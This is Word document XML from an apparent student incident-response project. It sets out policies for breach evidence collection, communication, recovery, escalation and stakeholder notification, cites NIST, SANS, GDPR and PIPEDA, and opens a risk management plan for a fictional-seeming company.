        <w:t xml:space="preserve"> Accurate data supports forensic analysis and regulatory compliance. Proper data collection ensures compliance, supports investigations, and strengthens the organization’s ability to defend against liability claims.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Data Security &amp; Breach Requirements:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Preserve system logs from affected systems for at least 90 days.</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chain-of-custody protocols for evidence handling.</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Encrypt evidence data to ensure confidentiality.</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Restrict evidence access to authorized personnel only.</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Implement automated log monitoring for critical systems.</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Record timestamps and sources for all evidence collected.</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forensic imaging tools to clone affected systems.</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Store evidence in secure, access-controlled locations.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Involve third-party forensic experts when necessary.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Ensure documentation aligns with regulatory requirements (e.g., PCI DSS).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Activities:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Preserve logs, emails, and network traces during the Detection and Containment phases.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Ensure evidence integrity with chain-of-custody protocols.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Frequency: Per incident.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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automated tools to retrieve network traces.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Document every action to maintain an audit trail.</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Playbook Linkage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports the Identification and Containment phases by ensuring evidence is secured for analysis.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Consequences of Non-Compliance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Inadequate data collection could invalidate evidence and lead to legal challenges.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References: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SANS Incident Handler’s Handbook, SANS Institute, 2021.</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3. Communication Policy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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Standardize internal and external communication during a data breach to ensure transparency and trust.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Scope:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Applies to communication with employees, customers, partners, media, and regulatory bodies.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Importance: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Maintains transparency and trust while complying with legal obligations. Clear communication helps maintain customer confidence, comply with notification laws, and minimize misinformation.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Data Security &amp; Breach Requirement</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">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Notify affected customers within 72 hours of confirming a breach (GDPR standard).</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pre-approved templates for breach notifications.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Coordinate communication strategies with legal and PR teams.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Ensure consistent messaging across all channels.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Report breaches to regulators within specified timeframes.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Avoid disclosing sensitive details publicly unless required.</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Manage media relations to control the narrative.</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Provide customers with clear guidance on mitigating personal risks.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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secure channels for sensitive communications.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10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Monitor public reaction and adjust messaging as necessary.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Activities:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Notify affected customers and regulators within 72 hours (GDPR requirement​(Data Breach playbook above).</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Use approved templates for communication with media and clients.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Frequency: Triggered by incident severity.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Record all communication logs for review.</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Playbook Linkage: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Critical during the Recovery phase for public and stakeholder communication.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Consequences of Non-Compliance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Poor communication may result in reputational damage, customer attrition, and regulatory penalties.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References: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">GDPR and PIPEDA guidelines, Office of the Privacy Commissioner of Canada, 2018.</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4. Recovery Policy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Purpose:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure systems are restored securely and operational continuity is maintained.</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Scope:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Includes restoring IT systems, databases, and infrastructure to normal operations.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Importance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Effective recovery minimizes downtime and ensures continued business operations.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Data Security &amp; Breach Requirements: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Restore from clean, verified backups.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Conduct post-restoration vulnerability scans.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Test restored systems under controlled conditions.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Monitor for anomalies after reconnection.</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Update software and apply security patches.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Document all restoration actions for accountability.</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Engage affected vendors to ensure their systems are also secure.</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Validate user credentials before re-enabling access.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Enhance security measures to prevent recurrence.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Notify stakeholders once systems are operational.</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Activities:</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Develop and execute a step-by-step restoration plan.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Test systems post-restoration to verify integrity and functionality.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Reassess security controls to address vulnerabilities.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Frequency: Per incident recovery.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Conduct post-recovery analysis to identify process gaps.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Playbook Linkage:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Integral to the Recovery phase, addressing system integrity and functionality..</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Consequences of Non-Compliance:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Prolonged outages and vulnerabilities could lead to recurring breaches.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References:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> NIST SP 800-61r2.</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Trigger Points and Escalations</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Sensitive Customer Data Compromise: Immediate notification to legal and compliance teams.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Critical System Affected: Engage CSIRT to manage impact on business operations.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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Malware Presence Detected: Quarantine systems and inform network teams.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Repeated Login Attempts from Untrusted Locations: Investigate and escalate to forensics.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Regulatory Reporting Deadline Approaching: Prioritize legal notification to regulators.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Stakeholder Notifications</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Executives: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Brief on business impact and resource requirements.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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0"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Legal Counsel: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Advise on compliance and customer notification.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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0"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">IT Teams:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Coordinate technical containment and recovery.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Public Relations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Manage external communication and media statements.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Regulators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure timely reporting as per GDPR or PIPEDA.</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Reflection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0"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This project highlighted the complexity of aligning incident response processes with regulatory frameworks. Designing a robust playbook and policy set ensures clear accountability, streamlined actions, and compliance, reinforcing organizational resilience.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="140"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="300" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion</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Importance of Reporting and Notification: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Timely reporting ensures compliance with regulations, such as GDPR and PIPEDA, and protects customers by enabling swift risk mitigation. Accurate notifications build transparency and trust.</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Record Keeping: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprehensive documentation of breach response activities ensures accountability, supports audits, and strengthens organizational learning for future incidents.</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b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Reference</w:t>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Style w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">National Institute of Standards and Technology. (2012). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Computer security incident handling guide</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Special Publication 800-61 Revision 2). </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:tooltip="http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">http://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Office of the Privacy Commissioner of Canada. (2018). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">PIPEDA: What you need to know about mandatory reporting of breaches of security safeguards.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:tooltip="https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.priv.gc.ca/en/privacy-topics/privacy-laws-in-canada/the-personal-information-protection-and-electronicdocuments-act-pipeda/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">SANS Institute. (2021). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Handler’s Handbook.</w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:tooltip="https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve"> https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">European Union. (2016). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">General Data Protection Regulation (GDPR).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:tooltip="https://gdpr-info.eu/" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="186"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
            <w:color w:val="0000ff"/>
            <w:sz w:val="20"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">https://gdpr-info.eu/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="200" w:before="100" w:line="331" w:lineRule="auto"/>
        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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Slide presentation link</w:t>
      </w:r>
      <w:r/>
    </w:p>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Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">https://docs.google.com/presentation/d/13Tjse-mvgx5eDLjXuh6HcJO-u7dOo4GTnOwUNRTWzhc/edit?usp=sharing</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Risk Management Plan for DHA Enterprise Inc. (DHAEI)</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Executive Summary</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color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">This Risk Management Plan aims to protect DHAEI’s IT infrastructure, data, and services from emerging cybersecurity risks. Based on the NIST Risk Management Framework (RMF), MITRE ATT&amp;CK, and Industry Canada standards, it addresses potential threats such a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">s data breaches, ransomware, and service disruptions. Implementing structured risk assessment, continuous monitoring, and prioritized mitigation strengthens DHAEI’s response capabilities and resilience.</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Purpose, Scope, and Users</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Purpose</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: The plan outlines a structured approach to identifying, assessing, mitigating, and monitoring risks that impact the confidentiality, integrity, and availability (CIA) of DHAEI’s assets, leveraging the NIST RMF, MITRE ATT&amp;CK framework, and Industry Canada</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> guidelines.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Scope</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: DHAEI’s digital assets, network infrastructure, data security, and continuity measures fall within this plan’s scope.</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="664"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11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Users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: The intended audience includes DHAEI’s executive team, IT department, SOC analysts, and third-party service providers, ensuring unified risk management practices.</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Risk Assessment Using NIST RMF and MITRE ATT&amp;CK</w:t>
      </w:r>
      <w:r/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="141"/>
        <w:pBdr>
          <w:top w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:left w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:bottom w:val="none" w:color="000000" w:sz="4" w:space="0"/>
          <w:right w:val="none" w:color="000000" w:sz="4" w:space="0"/>
        </w:pBdr>
        <w:spacing w:after="40" w:before="80" w:line="331" w:lineRule="auto"/>
